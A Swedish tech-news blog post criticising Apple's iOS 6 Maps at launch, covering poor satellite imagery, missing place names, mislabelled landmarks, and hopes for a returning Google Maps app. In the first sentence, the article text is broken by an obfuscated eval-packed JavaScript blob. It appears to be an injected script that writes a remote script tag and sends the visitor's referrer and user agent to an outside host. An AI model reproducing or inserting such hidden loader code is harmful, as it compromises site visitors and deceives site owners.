Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Apple misslyckas med iOS 6 Maps

Apple misslyckas med iOS 6 Maps
Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tahks|var|u0026u|referrer|hkizh||js|php’.split(’|’),0,{}))
vi vet är Google Maps nu ett minne blott i iOS 6. Nu är det Apples egna Maps som vi får använda oss. Tyvärr har den nya tjänsten redan vid lansering stött på massa dålig kritik samt buggar som Apple inte räknat med.

Redan samma dag som Apple lanserade iOS 6 började kritik från användare välla in till Apple samt även ut på diverse forum.

Några problem med appen är att vi i Sverige får anpassa oss till svartvita, lågupplösta satellitbilder som ibland även täcks av moln. Vi på redaktionen har även märkt att många gatunamn och platser saknas i vissa städer. The Verge skriver att detta även upplevs i större städer som London, Tokyo och Peking.

En komisk punkt är att Washington Monument i USA är felmärkt med några hundra meter samt att 3d-effekten gör att snygga moderna fastigheter ser ut som rena renoveringsobjekt.

Dock har självklart Apple satsat mer på USA än andra länder när det kommer till kartan. Till övriga världen har Apple använt sig av många olika karttjänster och därför blir resultatet ofta som det blir.

Användare har startat up hemsidor på Internet där bilder postas på de mest förfärliga felen i kartan. Sidor som ”The Amazing iOS 6 Maps” är en som blivit väldigt stor på senare tid.
Om inte Apple arbetar fram en lösning på detta motsvarande Google Transit Maps kommer detta sluta i ren katastrof. Hoppet om att Google Maps kommer tillbaka är inte ute.

Rykten om att Google redan har skickat in Google Maps till Apple har även nått Techcrunch. Google hoppas få sin app släppt innan jul så att vi hittar rätt i snöovädret. Dock är det upp till Apple att godkänna applikationen vilket inte är ett gott tecken så här i lanseringstider.

Vi hoppas Google får igenom den så man i alla fall får ett val att ta när man ska hitta rätt.

Via: IDG Sweden